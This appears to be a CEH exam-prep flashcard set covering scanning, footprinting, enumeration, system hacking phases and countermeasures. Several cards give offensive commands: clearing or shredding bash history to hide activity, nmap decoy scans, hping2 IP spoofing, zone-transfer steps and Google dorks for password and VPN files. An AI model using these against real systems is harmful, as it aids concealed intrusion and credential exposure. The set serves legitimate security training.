Alice frequents coffee shops, libraries, and other public areas where your company's remote employees typically work. Alice knows that the username and password employees use to log in to their laptops are the same credentials used to access the company's virtual private network (VPN). When an employee first arrives and pulls out a laptop, Alice will position herself in a seat behind that employee. When the employee enters the login credentials to unlock the laptop, Alice will look over the employee's shoulder to see the username and which keys are typed for the password. What should the company do to prevent this shoulder surfing attack? A)Purchase and distribute privacy filter screens to remote employees. B)Implement and require full disk encryption for new and existing laptops. C)Apply asset tags with the text "Look over your shoulder!" on new laptops. D)Create and enforce a physical security policy for remote employees.
secretly track
All In One Keylogger allows you to ___ all activities from all computer users and automatically receive logs to a desired email/FTP/LAN accounting
exploit vulnerabilities
Attackers try various tools and attack techniques to ______ in a computer system or security policy and controls to achieve their motives
A)127.0.0.1
After a recent malware infection, one of the devices in your network is found to be continually changing its LAN connection settings to use itself as a proxy server. It resides in the 192.168.1.0/24 network. Which IP address will be used on the device for the proxy server? A)127.0.0.1 B)255.255.255.255 C)192.168.1.1 D)192.168.1.255
C)Installing a driver
After successfully executing a buffer overflow attack on a Windows machine, which of the following actions is NOT allowed in the security context of the LOCAL_SYSTEM account? A)Spawning a shell B)Changing the time zone C)Installing a driver D)Debugging an application
B) ACK
After the three-way handshake, which flag is set in packets sent in either direction? A) SYN B) ACK C) FIN D) XMAS
www.networksolutions.com www.godaddy.com www.register.com
After you have your IP address number and want to register your name where can you go?
content monitoring services up-to-date information
Alerts are the ____ that provide ____ based on your preference usually via email or SMS in an automated manner.
D)Allan will be unable to establish an interactive session
Allan has completed the following steps in an attempt to hack a web application: -Obtained a valid session ID token via an XSS vulnerability -Confirmed that the session ID manager validates the source IP address as well -Spoofed the required IP address -Replayed the session ID What will be the result? A)The session ID manager will create a new session ID B)The session ID manager will determine the address is spoofed C)Allan will be able to establish an interactive session D)Allan will be unable to establish an interactive session
InSpy
Attackers use ___ utility, which performs enumeration on LinkedIn and finds people based on job title, company, or email address
A. DNSRV1.anycomp.com, 3600 seconds
An SOA record gathered from a zone transfer is shown here: @ IN SOA DNSRV1.anycomp.com. postmaster.anycomp.com. ( 4 ; serial number 3600 ; refresh [1h] 600 ; retry [10m] 86400 ; expire [1d] 3600 ) ; min TTL [1h] What is the name of the authoritative DNS server for the domain, and how often will secondary servers check in for updates? A. DNSRV1.anycomp.com, 3600 seconds B. DNSRV1.anycomp.com, 600 seconds C. DNSRV1.anycomp.com, 4 seconds D. postmaster.anycomp.com, 600 seconds
B. The administrator is configuring IP masquerading.
An administrator enters the following command on a Linux system: iptables -t nat -L Which of the following best describes the intent of the command entered? A. The administrator is attempting a port scan. B. The administrator is configuring IP masquerading. C. The administrator is preparing to flood a switch. D. The administrator is preparing a DoS attack.
B)tcpd
An administrator has configured SMTP and HTTP services running on a FreeBSD server. She wants to allow standard email and web traffic across registered ports 25, 80, and 443. However, any unauthorized access should be logged and denied. Which daemon should you use for logging and simple access control? A)smtpd B)tcpd C)httpd D)asmtpd
antivirus (AV) software
An application that monitors a computer or network to identify, and prevent, malware. ___ is usually signature-based and can take multiple actions on defined malware files/activity.
Zero-Day Attack
An attack that exploits computer application vulnerabilities before the software developer releases a patch for the vulnerability
Operating system (OS) attack
An attack that exploits the common mistake many people make when installing operating systems--that is, accepting and leaving all the defaults.
Active attack
An attack that is direct in nature -- usually where the attacker injects something into, or otherwise alters, the network or system target.
cross-site scripting (XSS)
An attack whereby the hacker injects code into an otherwise legitimate web page, which is then clicked by other users or is exploited via Java or some other script method. The embedded code within the link is submitted as part of the client's web request and can execute on the user's computer.
exploit the applicaitons
An attacker can ___ with the setuid or setgid flags to execute malicious code with elevated privileges
B)FQDNs of all intermediary devices
An attacker is using the traceroute tool to carry out network footprinting. Which of the following may NOT be discovered using this tool? A)Structure of the network B)FQDNs of all intermediary devices C)IP addresses of routers and firewalls D)IP addresses of internal computers
Track company's online reputation Collect company's search engine ranking information Obtain email notifications when a company is mentioned online Track conversations Obtain social news about the target organization
An attacker makes use of ORM tracking tools to:
B)Decreases the packet send frequency of the scan
An attacker recently used Nmap to SYN scan your network. You discover that he adjusted the timing options of the scan, thereby avoiding detection by your network intrusion detection system (IDS). How does adjusting the timing options affect the Nmap scan? A)Identifies the operating systems being used on the network B)Decreases the packet send frequency of the scan C)Generates scanning decoys on the network D)Determines which network hosts are not available
A. The HTML file has permissions of read only
An attacker successfully executes a buffer overflow against an IIS web server. He spawns an interactive shell with plans to deface the main web page. An attempt to use the echo command to overwrite index.html does not work, and an attempt to delete the page altogether also fails. Additionally, an attempt to copy a new page in its place also fails. What is the probable cause of the attacker's problem? A. The HTML file has permissions of read only B. A buffer overflow attack cannot deface a web page C. The LOCAL_SYSTEM privilege level is insufficient for the attempts D. The server is using Kerberos authentication
B)Network sniffer
An attacker wants to be able to implement a man-in-the-middle (MITM) attack to capture authentication tokens used on a corporate network. Which type of tool would he use? A)Port scanner B)Network sniffer C)Penetration tester D)Vulnerability scanner
black hat
An attacker who breaks into computer systems with malicious intent, without the owner's knowledge or permission.
D)HR department
An employee has been found to be in direct violation of the company's security policy. When you inform him of the policy, he claims to know nothing about it. You need to find out if he was made aware of the security policy. Which entity should be able to confirm this? A)IT department B)Legal department C)Upper management D)HR department
Banner grabbing
An enumeration technique used to provide information about a computer system; generally used for operating system identification (also known as fingerprinting).
Annualized rate of occurrence (ARO)
An estimate of the number of times during a year a particular asset would be lost or experience downtime.
A. The port is filtered at the firewall.
An ethical hacker is ACK-scanning against a network segment he knows is sitting behind a stateful firewall. If a scan packet receives no response, what does that indicate? A. The port is filtered at the firewall. B. The port is not filtered at the firewall. C. The firewall allows the packet, but the device has the port closed. D. It is impossible to determine any port status from this response.
A. A white hat is attempting a black-box test
An ethical hacker is given no prior knowledge of the network and has a specific framework in which to work. The agreement specifies boundaries, nondisclosure agreements, and a completion date definition. Which of the following statements is true? A. A white hat is attempting a black-box test. B. A white hat is attempting a white-box test. C. A black hat is attempting a black-box test. D. A black hat is attempting a gray-box test.
ike-scan
Attackers can probe further using a tool such as ___ to enumerate the sensitive information including encryption and hashing algorithm, authentication type, key distribution algorithm, SA LifeDuration, etc.
A. A white hat is attempting a black-box test.
An ethical hacker is hired to test the security of a business network. The CEH is given no prior knowledge of the network and has specific framework in which to work, defining boundaries, nondisclosure agreements, and the completion date. Which of the following is a true statement? A. A white hat is attempting a black-box test. B. A white hat is attempting a white-box test. C. A black hat is attempting a black-box test. D. A black hat is attempting a gray-box test.
C. Stealth
An ethical hacker is sending TCP packets to a machine with the SYN flag set. None of the SYN/ACK responses on open ports is being answered. Which type of port scan is this? A. Ping sweep B. XMAS C. Stealth D. Full
Source routing
An ethical hacker sends a packet with a deliberate and specific path to its destination. What technique is the hacker using?
C. Split DNS
An organization has a DNS server located in the DMZ and other DNS servers located on the intranet. What is this implementation commonly called? A. Dynamic DNS B. DNSSEC C. Split DNS D. Auto DNS
C) Core Impact D) CANVAS
An organization wants to save time and money and decides to go with an automated approach to pen testing. Which of the following tools would work for this? (Choose two) A) Nmap B) Netcat C) Core Impact D) CANVAS
business impact analysis (BIA)
An organized process to gauge the potential effects of an interruption to critical business operations as a result of disaster, accident, or emergency.
Data Encryption Standard (DES)
An outdated symmetric cipher encryption algorithm, previously U.S. government-approved and used by business and civilian government agencies. It is no longer considered secure because of the ease with which the entire keyspace can be attempted using modern computing, thus making cracking the encryption easy.
asset
Any item of value or worth to an organization, whether physical or virtual.
Improper data/input validation Authentication and Authorization attacks Security misconfiguration Information disclosure Broken session management Buffer overflow issues Cryptography attacks SQL injection Improper error handling and exception management
Application Threats
weaknesses and misconfigurations
Applications include many ___ like unquoted paths, path environment variable misconfiguration, and searchorder hijacking that lead to path interception
Link local
Applies only to hosts on the same subnet
UDP Scanning
Are you open on UDP Port 29 --> <-- No response if port it Open or <-- If port is closed, an ICMP Port unreachable message is received
fragmented packets
Attackers can use Colasoft Packet Builder to create ____ to bypass firewalls and IDS systems in a network
encode malicious content
Attackers can use DNS tunneling to ___ or data of other programs within DNS queries and replies
B. ICMP is being filtered.
As a pen test on a major international business moves along, a colleague discovers an IIS server and a mail exchange server on a DMZ subnet. You review a ping sweep accomplished earlier in the day on that subnet and note neither machine responded to the ping. What is the most likely reason for the lack of response? A. The hosts might be turned off or disconnected. B. ICMP is being filtered. C. The destination network might be down. D. The servers are Linux based and do not respond to ping requests.
B. Passive
As a pen test team member, you begin searching for IP ranges owned by the target organization and discover their network range. You also read job postings and news articles and visit the organization's website. Throughout the first week of the test, you also observe when employees come to and leave work, and you rummage through the trash outside the building for useful information. Which type of footprinting are you accomplishing? A. Active B. Passive C. Reconnaissance D. None of the above
B)Creates a binary log file in a specific folder.
As a security professional for your company, you must perform routine network analysis. Today you must perform a traffic capture using tcpdump. You run the tcpdump -w /log command. What does this command do? A)Captures the packets from a particular host. B)Creates a binary log file in a specific folder. C)Reads packets from a specific folder. D)Captures the packets on a specific interface.
B. Privacy Act
As part of a pen test on a U.S. government system, you discover files containing Social Security numbers and other sensitive personally identifiable information (PII) information. You are asked about controls placed on the dissemination of this information. Which of the following acts should you check? A. FISMA B. Privacy Act C. PATRIOT Act D. Freedom of Information Act
B)Network administrator issues RFID cards for the server room and reviews the door logs
As part of a security audit, your team is looking for common security design issues. In which scenario would applying the segregation of duties principle enhance security? A)IT techs have passwords of 5 characters, while users have passwords of 12 characters B)Network administrator issues RFID cards for the server room and reviews the door logs C)Sales group both creates marketing materials and edits the materials D)User is allowed to install his own software and attach hardware to his computer
A. Gray box
As part of the preparation phase for a pen test you are participating in, the client relays their intent to discover security flaws and possible remediation. They seem particularly concerned about internal threats from the user base. Which of the following best describes the test type the client is looking for? A. Gray box B. Black box C. White hat D. Black hat
C)Active port scanning on 10.1.1.119
As part of your job duties, you must regularly review the log files for several servers on your network. Recently while reviewing the log files for a server with the IP address of 10.1.1.119, you see the following events: Time: Dec 28 02: 12: 48 Port: 20 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02: 12: 54 Port: 21 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02: 13: 01 Port: 22 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02: 13: 07 Port: 23 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02: 13: 15 Port: 25 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02: 13: 21 Port: 80 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02: 13: 24 Port: 110 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Which activity occurred according to these entries? A)Active port scanning on 10.1.1.26 B)DoS attack against 10.1.1.26 C)Active port scanning on 10.1.1.119 D)DoS attack against 10.1.1.119
router
As the packet travels through the nodes in the network, each ___ examines the destination IP address and chooses the next hop to direct the packet to the destination
C)www.netcraft.com
As your company's ethical hacker, you often perform routine penetration tests to check the security for your company's network. Last week, an attacker posted details obtained through operating system fingerprinting about your company's servers. You need to perform the same type of check to verify what information is available. Which tool should you use? A)www.webextractor.com B)www.changedetection.com C)www.netcraft.com D)www.whois.com
Encrypted HTTPS protocol to send exploits to the Web server
As your company's security practitioner, you are responsible for overall network security, which includes an IDS and a firewall. In addition, you must ensure that the company's Web server is protected. Your company's Web server has been the target of an advanced persistent threat (APT). The IDS log files do not show any intrusion attempts, but the Web server constantly locks up and requires constant rebooting. After the latest incident, you review the firewall logs and notice a large number of SSL request packets. You decide to implement the following security measures: Install a proxy server and terminate SSL at the proxy Install a hardware SSL accelerator and terminate SSL at that layer. What is the best description of the attack vector? A)Encrypted HTTPS protocol to send exploits to the Web server B)Encrypted IPSec protocol to send exploits to the firewall C)Encrypted IPSec protocol to send exploits to the Web server D)Encrypted HTTPS protocol to send exploits to the firewall
Confidentiality
Assurance that the information is accessible only to those authorized to have access
Availability
Assurance that the systems responsible for delivering, storing, and processing information are accessible when required by the authorized users
Network (Layer 3)
At which layer of the OSI model do packet filtering firewalls operate?
Application (Layer 7)
At which layer of the OSI model do proxy servers operate?
Application layer (Layer 7)
At which layer of the OSI model does a cross-site scripting attack occur?
determine key hosts in the network
Attackers can gather DNS information to _____ and can perform social engineering attacks.
exfiltrate stolen confidential
Attackers can make use of this back channel to ___ or sensitive information from the server using DNS tunneling
spoofed tokens
Attackers can obrain access tokens of other users or generate ___ to escalate privileges and perform malicious activities by evading detection
cat /dev/null > ~.bash_history && history -c && exit
BASH Clearing the user's complete history
export HISTSIZE=0
BASH Disabling history
shred ~/.bash_history (Shreds the history file, making its content unreadable) shred ~/.bash_history && cat /dev/null > .bash_history && history -c && exit (Shreds the history file and clear the evidence of the command)
BASH Shredding the history
disaster recovery plan (DRP)
BCPs include a ___ that addresses exactly what to do to recover any lost data or services.
1) Intimate employees about what you collect, why and what you will do with it 2) Keep employees' personal information accurate, complete, and up-to-date 3) Limit the collection of information and collect it by fair and lawful means 4) Provide employees access to their personal information 5) Inform employees about the potential collection, use, and disclosure of personal information 6) Keep employees' personal information secure
Basic Rules for Privacy Policies at Workplace
integrity
Bit flipping is one form of an ___ attack.
- Check for Live Systems - Check for Open Ports - Scanning Beyond IDS - Banner Grabbing - Scan for Vulnerability - Draw Network Diagrams - Prepare Proxies - Scanning Pen Testing
CEH Scanning Methodology
Information Systems Audit and Control Association (ISACA) and IT Governance Institute (ITGI)
COBIT (Control Objects for Information and Related Technology was created by what?
Planning and organization Acquisition and implementation Delivery and support Monitoring and evaluation
COBIT categorizes control objectives into what domains?
No
Can you compete the three-way handshake and open a successful TCP connection with spoofed IP addresses
Sniffing the network traffic
Capturing and analyzing packets from the target enables an attacker to determine OS used by the remote system
Tails
Censorship Circumvention Tool
C) APR poisoning
Certain switches provide several security features. What would enabling DHCP snooping help to prevent against this? A) MAC flooding B) DNS flooding C) APR poisoning D) DNS poisoning
B. The host is most likely a printer or has a printer installed.
Consider the ports shown in the nmap output returned on an IP scanned during footprinting: PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 80/tcp open http 139/tcp open netbios-ssn 515/tcp open 631/tcp open ipp 9100/tcp open MAC Address: 01:2A:48:0B:AA:81 Which of the following is true regarding the output? A. The host is most likely a router or has routing enabled. B. The host is most likely a printer or has a printer installed. C. The host is definitely a Windows Server. D. The host is definitely a Linux Server.
White hats
Considered the good guys, these are the ethical hackers, hired by a customer for the specific goal of testing and improving security or for other defensive purposes. Need prior consent. Also known as security analysts.
corrective controls
Controls internal to a system designed to resolve vulnerabilities and errors soon after they arise.
CCleaner DBAN Privacy Eraser Wipe BleachBit ClearProg
Covering Tracks Tools
plists
Daemons have ___ that are linked to executables that run at start up
Source Port -- Destination Port Sequence Number Acknowledgment Number Offset - Reserved - Flags - Window Checksum Options - Padding Data
Describe the TCP segment structure
SYN Seguence #105 <----------- SYN/ACK (Your) Sequence #106 (My) Sequence #223 ---------------> ACK (Your) Sequence #224 (My) Sequence #106
Describe the three-way handshake.
StegoStick StegJ Office XML SNOW Data Stash Hydan
Document Steganography Tools
authenticity
Digital signatures can be used to guarantee the ___ of the person sending a message.
Attacker: --> Target Sending packet with spoofed 10.0.0.5 IP-TTL 13 Target --> Real IP Sending a packet to 10.0.0.5 IPO Real IP --> Target Reply from real 10.0.0.5 IP-TTL 25
Direct TTL Probe flow
site:domain or web page string example: site:anywhere.com passwds
Displays pages for a specific website or domain holding the search term.
index of/string example: "intitle:index of" passwd
Displays pages with directory browsing enabled, usually used with another operator.
inurl:string example: inurl:passwd example: allinurl: etc passwd
Displays pages with the string in the URL.
live machines port port status OS details device type system uptime
During the Scanning Phase what type of information can be extracted?
C)Results of past audits as examples of previous work
During the presentation of bids for penetration testing work, which of the following additions to a proposal would be unethical to submit? A)Suggestions of testing formats that worked in the past B)Letters of recommendation from former customers C)Results of past audits as examples of previous work D)Time estimates based on previous experience
A)Assign read-only permission to all HTML files and folders for the www-data group
During vulnerability assessment, you rank the public-facing website as an integral asset to the company's continued reputation and revenue. But there are several potential threats to the Apache HTTP Server that hosts the website. The static webpages in particular could be vulnerable to defacement. Which security control should you implement? A)Assign read-only permission to all HTML files and folders for the www-data group B)Assign write permissions to the web root for only the www-data group C)Assign write-only permission to all HTML files and folders for the www-data group D)Assign read and write permissions to the web root for only the www-data group
A)Pre-Attack
During which phase of security testing is a non-disclosure agreement (NDA) executed? A)Pre-Attack B)Attack C)Post Attack D)Recon
-By default, LDAP traffic is transmitted unsecured; use SSL or STARTTLS technology to encrypt the traffic -Select a user name different from your email address and enable account lockout
Enumeration Countermeasres for LDAP
-Disable SMB protocol on Web and DNS Servers -Disable SMB protocol on Internet facing servers -Disable ports TCP 139 and TCP 445 used by the SMB protocol -Restrict anonymous access through RestrictNullSessAccess parameter from the Windows Registry
Enumeration Countermeasures for SMB
Configure SMTP servers to: -Ignore email messages to unknown recipients -Not to include sensitive mail server and local host information in mail responses -Disable open relay feature -Limit the number of accepted connections from a source in order to prevent brute force attacks
Enumeration Countermeasures for SMTP
ICMP Type 3 Code 10
Error message - Host administratively prohibited
ICMP Type 3 Code 7
Error message - Host unknown
ICMP Type 3 Code 9
Error message - Network administratively prohibited
ICMP Type 3 Code 6
Error message - Network unknown
Banner grabbing from error messages
Error messages provide information such as type of server, type of OS, and SSL tool used by the target remote system
verify the existence of exploitable vulnerabilities
Ethical hacking focuses on simulating techniques used by attackers to _____ in the system security
identify vulnerabilities
Ethical hacking involves the use of hacking tools, tricks, and techniques to ______ so as to ensure system security
B. The capture shows step 2 of a TCP handshake.
Examine the Snort output shown here: 08/28-12:23:13.014491 01:10:BB:17:E3:C5 -> A5:12:B7:55:57:AB type: 0x800 len: 0x3C 190.168.5.12:33541 -> 213.132.44.56:23 TCP TTL:128 TOS: 0x0 ID:12365 IpLen:20 DgmLen:48 DF ***A**S* Seq: 0xA153BD Ack: 0xA01657 Win: 0x2000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOPSackOK 0x000: 00 02 B3 87 84 25 00 10 5A 01 0D 5B 08 00 45 00 .%..Z..[..E. 0x0010: 00 30 98 43 40 00 80 06 DE EC C0 A8 01 04 C0 A8 .0.C@... 0x0020: 01 43 04 DC 01 BB 00 A1 8B BD 00 00 00 00 70 02 .C....p. 0x0030: 20 00 4C 92 00 00 02 04 05 B4 01 01 04 02 .L..... Which of the following is true regarding the packet capture? A. The capture indicates a NOP sled attack. B. The capture shows step 2 of a TCP handshake. C. The packet source is 213.132.44.56. D. The packet capture shows an SSH session attempt.
A. One hour
Examine the following SOA record: @ IN SOARDNSRV1.somebiz.com. postmaster.somebiz.com. ( 200408097 ; serial number 3600 ; refresh [1h] 600 ; retry [10m] 86400 ; expire [1d] 7200 ) ; min TTL [2h] How long will the secondary server wait before asking for an update to the zone file? A. One hour B. Two hours C. Ten minutes D. One day
B. This rule will alert on packets coming from outside the designated home address. D. This rule will alert on packets designated on port 23, from any port, containing the "admin" string.
Examine the following Snort rule: alerttcp !$HOME_NET any -> $HOME_NET 23 (content: "admin"; msg: "Telnet attempt..admin access";) Which of the following are true regarding the rule? (Choose all that apply.) A. This rule will alert on packets coming from the designated home network. B. This rule will alert on packets coming from outside the designated home address. C. This rule will alert on packets designated for any port, from port 23, containing the "admin" string. D. This rule will alert on packets designated on port 23, from any port, containing the "admin" string.
A. The operator is enumerating a system named someserver.
Examine the following command sequence: C:\> nslookup Default Server: ns1.anybiz.com Address: 188.87.99.6 > set type=HINFO > someserver Server: resolver.anybiz.com Address: 188.87.100.5 Someserver.anybiz.com CPU=Intel Quad Chip OS=Linux 2.8 Which of the following best describes the intent of the command sequence? A. The operator is enumerating a system named someserver. B. The operator is attempting DNS poisoning. C. The operator is attempting a zone transfer. D. The operator is attempting to find a name server.
B. Nslookup is in interactive mode. C. The output will show all mail servers in the zone somewhere.com.
Examine the following command-line entry: C:\>nslookup Default Server: ns1.somewhere.com Address: 128.189.72.5 > set q=mx > mailhost Which statements are true regarding this command sequence? (Choose two.) A. Nslookup is in non-interactive mode. B. Nslookup is in interactive mode. C. The output will show all mail servers in the zone somewhere.com. D. The output will show all name servers in the zone somewhere.com
Comments in the source code Contact details of web developer or admin File system structure Script type
Examining HTML source provides what kind of information?
Access Control Policy Remote-Access Policy Firewall-Management Policy Network-Connection Policy Passwords Policy User-Account Policy Information-Protection Policy Special-Access Policy Email Security Policy Acceprable-Use Policy
Examples of Security Policies
Facial images Fingerprints Handwriting samples
Examples of biometrics
filetype:rcf inurl:vpn
Finds Sonicwall Gloval VPN Client files containing sensitive information and login
filetype:pcf vpn OR Group
Finds publicly accessible profile configuration files (.pcf) used by VPN clients
SYN sequence number
First, a session must be established between the two systems. To do this, the sender forwards a segment with the ___ flag set, indicating a desire to synchronize a communications session. This segment also contains a ____ -- a pseudo-random number that helps maintain the legitimacy and uniqueness of this session.
-Restrict the employees to access social networking sites from organization's network - Configure web servers to avoid information leakage - Educate employees to use pseudonyms on blogs, groups, and forums - Do not reveal critical information in press releases, annual reports, product catalogues, etc - Limit the amount of information that you are publishing on the website/Internet - Use footprinting techniques to discover and remove any sensitive information publicly available - Prevent search engines from caching a web page and use anonymous registration services
Footprinting Countermeasures
- Enforce security policies to regulate the information that employees can reveal to third parties - Set apart internal and external DNS or use split DNS, and restrict zone transfer to authorized servers - Disable directory listings in the web servers - Educate employees about various social engineering tricks and risks - Opt for privacy services on Whois Lookup database -Avoid domain-level cross-linking for the critical assets - Encrypt and password protect sensitive information
Footprinting Countermeasures (cont'd)
Maltego Recon-ng FOCA Prefix Whois Netmask NetScanTools Pro Binging Tctrace SearchBug Autonomous System Scanner (ASS) TinEye DNS-Digger Robtex Dig Web Interface SpiderFoot White Pages NSlookup Email Tracking Tool Zaba Search yoName GeoTrace Ping-Probe DomainHostingView MetaGoofil GMapCatcher Wikto SearchDiggity SiteDigger Google HACK DB Google Hacks Gooscan BiLE Suite Trellian
Footprinting Tools
pen testing
Footprinting ____ is used to determine organization's publicly available information
security posture
Footprinting allows attackers to know the ___ of the target organizaiton
Facebook Linkedin Twitter Google+ Pinterest
Gather target organization employees information from their personal profiles on social networking sites such as ____ , etc. that assist to perform social engineering
Market value of a company's shares Company profile Competitor details
Gathering Information from Financial Services provides what kinds of information?
nmap -D RND:10 [target]
Generates a random number of decoys using Nmap
A. SYN, SYN/ACK, ACK
Given the following Wireshark filter, what is the attacker attempting to view? ((tcp.flags == 0x02) || (tcp.flags == 0x12)) || ((tcp.flags == 0x10) && (tcp.ack==1) && (tcp.len==0)) A. SYN, SYN/ACK, ACK B. SYN, FIN, URG, and PSH C. ACK, ACK, SYN, URG D. SYN/ACK only
A)Generate a banner that describes what service is running on port 443 if it is open
Given this command: telnet 192.168.5.5 443 What will it do? A)Generate a banner that describes what service is running on port 443 if it is open B)Close all open Telnet sessions in 4 minutes and 43 seconds C)Open a Telnet session with the device at 192.168.5.5 in 4 minutes and 43 seconds D)Test the Telnet connection every 443 seconds and sends an alert if it doesn't answer
TCP/UDP 3268
Global Catalog Service
hidden storage
GrayFish is a Windows kernel rootkit that runs inside the Windows operating system and provides an effective mechanism, ___, and malicious command execution while remaining invisible
Non-Repudiation
Guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message
modifying system application features
Hacking involves ___ or ___ to achieve a goal outside of the creator's original purpose
-Open Local Group Policy Editor and navigate to Local Computer Policy --> Computer Configuration --> Administrative Templates --> Network --> DNS Client -In DNS client, double-click on Turn off multicast name resolution -Select the Disabled radio button and then click OK
How do you disable LMBNR
-Open Control Panel and navigate to Network and Internet --> Network and Sharing Center and click on Change adapter settings option present on the right side -Right-click on the network adapter and click Properties, select TCP/IPv4 and then click Properties -Under General tab, go to Advanced --> WINS -From the NetBIOS options, check "Disable NetBIOS over TCP/IP" radio button and click OK
How do you disable NBT-NS
1) Connect to the SOA 2) Enter nslookup at the command line. 3) Type server <IPAddress>, using the IP address of the SOA. Press ENTER. 4) Type ls -d domainname.com, where domainname.com is the name of the zone, and then press ENTER.
How do you do a zone transfer with nslookup?
Open the snort.config file and comment out all of the rules you do not wish to use
How do you prevent rule files from loading when snort is started?
1) nslookup 2) server servername
How do you switch to your target's server using nslookup?
Uses a word list based on variations of dictionary words to discover the password
How does a hybrid password attack work? A)Uses different known factors about the user, such as date of birth, license number, and other personally identifiable information (PII) to discover the password B)Uses every possible combination of letters, numbers, and special characters to discover the password C)Uses a word list based on variations of dictionary words to discover the password D)Uses a dictionary input list to discover the password
B)Hides message with whitespace
How does the tool SNOW facilitate the use of steganography? A)Hides files with folders B)Hides message with whitespace C)Hides messages in graphics D)Hides messages in carrier files
16 bits long
How long is the field for port numbers?
Disable LMBNR Disable NBT-NS
How to Defend against LLMR/NBT-NS Poisoning
1) To delete NTFS streams, move the suspected files to FAT partition 2) Use third-party file integrity checker such as Tripwire File Integrity Monitoring to maintain integrity of an NTFS partition files 3) Use programs such as Stream Detector, LADS, ADS Detector, etc. to detect streams 4) Enable real-time antivirus scanning to protect against execution of malicious streams in your sytem 5) Use up-to-date antivirus software on your system
How to Defend against NTFS Streams
1) Reinstall OS/applications from a trusted source after backing up the critical data 2) Well-documented automated installation procedures need to be kept 3) Perform kernel memory dump analysis to determine the presence of rootkits 4) Harden the workstation or server against the attack 5) Educate staff not to download any files/programs from untrusted sources 6) Install network and host-based firewalls 7) Ensure the availability of trusted restoration media 8) Update and patch operating systems and applicaitons 9) Verify the integrity of system files regularly using cryptographically strong digital fingerprint technologies 10) Update antivirus and anti-spyware software regularly 11) Avoid logging in an account with administrative privileges 12) Adhere to the least privilege principle 13) Ensure the chosen antivirus software posses rootkit protection 14) Do not install unnecessary applications and also disable the features and services not in use
How to defend against Rootkits
-Q --seqnum
Hping option used in order to collect sequence numbers generated by the target host
-2
Hping sets UDP mode
-9
Hping sets in listen mode, to trigger on a signature argument when it sees it come through.
-8
Hping sets scan mode, expecting an argument for the ports to be scanned (single, range 1-1000)
-A
Hping sets the ACK flag
-F
Hping sets the FIN flag
-P
Hping sets the PSH flag
-R
Hping sets the RST flag
-X
Hping sets the XMAS scan flags.
--flood
Hping will send packets as fast as possible, without taking care to show incoming replies.
Habits
Human beings tend to follow set patterns and behaviors known as ____.
Email Security Policy
It is created to govern the proper usage of corporate email
Direct TTL Probes IP Identification Number TCP Flow Control Method
IP Spoofing Detection Techniques
was Internet Assigned Numbers Authority (IANA) now Internet Corporation for Assigned Names and Numbers (ICANN)
IP address management is done through what?
Layer 3 Network
IP resides at what layer of the OSI model?
Hping2 www.certifiedhacker.com -a 7.7.7.7
IP spoofing using Hping2
127.0.0.1
IPv4 loop back address
32 bits 128 bits
IPv6 increases the IP address size from __ to __, to support more levels of addressing hierarchy
UDP 500
ISAKMP/Internet Key Exchange (IKE)
NIDS and HIDS
If a ping sweep is not done properly or to fast what systems can detect it?
inject a malicious dylib
If attackers can ___ in one of the primary directories, it will be executed in place of the original dylib
stateful firewall
If doing an ACK flag probe and there is no response, this indicates a ____ is between the attacker and the host.
higher
If the SN (Serial Number) is ___ than that of the secondary, it's time to update).
port is open
If the TTL value of RST packet on particular port is less than the boundary value of 64, then that ___
Port is closed
If the TTL value of RST packet on particular port is more than the boundary value of 64, the that ___
is open
If the WINDOW value of RST packet on particular port has non zero value, then that port __
replace the target binary
If the file system permissions of binaries are not properly set, an attacker can ___ with a malicious file
replace redundant bits of image
Image steganography tools ___ data with the message in such a way that the effect cannot be detected by human eyes
D)Encrypting the data exchanged
In a hybrid PKI model, which function is performed by the symmetric algorithm? A)Encrypting the symmetric key exchanged B)Authenticating the remote device C)Exchanging the keys D)Encrypting the data exchanged
Logical safeguards
In a risk assessment, event logging and password management are examples of which type of safeguard?
Physical safeguards
In a risk assessment, facility access control and equipment inventory are examples of which type of safeguard?
B. Visit www.archive.org and see whether the old copy is available
In gathering information about a potential target, you carry out a social engineering attacks against employees. In eavesdropping, you overhear an employee conversation about a sensitive document that was inadvertently posted to the company website and remained on the site for a few days but was later removed. In checking the website, you find the document has indeed been removed, what is a possible solution to finding the document? A. Install Black Widow and copy the website to your machine; the page may simply be hidden B. Visit www.archive.org and see whether the old copy is available C. Attempt a SQL injection attack against the site D. None of the above. It is impossible to recover
B. The attacker is attempting a password crack D. The attacker is attempting to launch a command line shell
In the output of a network IDS capture you notice a large number of 0x90 values, with "/bin/sh" also appearing in the ACII part of the output. Which of the following are the most accurate assumptions based on these observations? (Choose Two) A. The attacker is attempting a buffer overflow B. The attacker is attempting a password crack C. The attacker is attempting a session hijack D. The attacker is attempting to launch a command line shell
XML denial of service
In what type of attack does the attacker craft an XML message with very large payloads, recursive content, excessive nesting, malicious external entities, or with malicious DTDs (Data Type Documents)?
Cover tracks
In which CEH system hacking stage do you clear the security log?
Escalate privileges
In which CEH system hacking stage do you dump the SAM file?
Executing applications
In which CEH system hacking stage do you execute the payload?
Cracking passwords
In which CEH system hacking stage do you use Brutus?
D. Parameter Manipulation
In which attack would a hacker modify the URL in the web browser's address field to attempt to gain access to resources they're not supposed to be able to view? A. SQL injection B. XSS C. Brute Force D. Parameter Manipulation
Conclusion
In which phase of Software Assurance Maturity Model do you advise corrective action?
Preparation
In which phase of Software Assurance Maturity Model do you execute a formal contract that guarantees non-disclosure of the client's data and legal protection for the tester?
Conduct
In which phase of Software Assurance Maturity Model does the tester look for potential vulnerabilities?
Maintaining Access
In which phase of an attack are rootkits installed and unpatched systems taken advantage?
Gaining Access
In which phase of an attack are the systems breeched, malicious code planted and backdoors opened?
B. Scanning and enumeration
In which phase of the ethical hacking methodology would a hacker be expected to discover available targets on a network? A. Reconnaissance B. Scanning and enumeration C. Gaining access D. Maintaining access E. Covering tracks
B. Scanning and enumeration
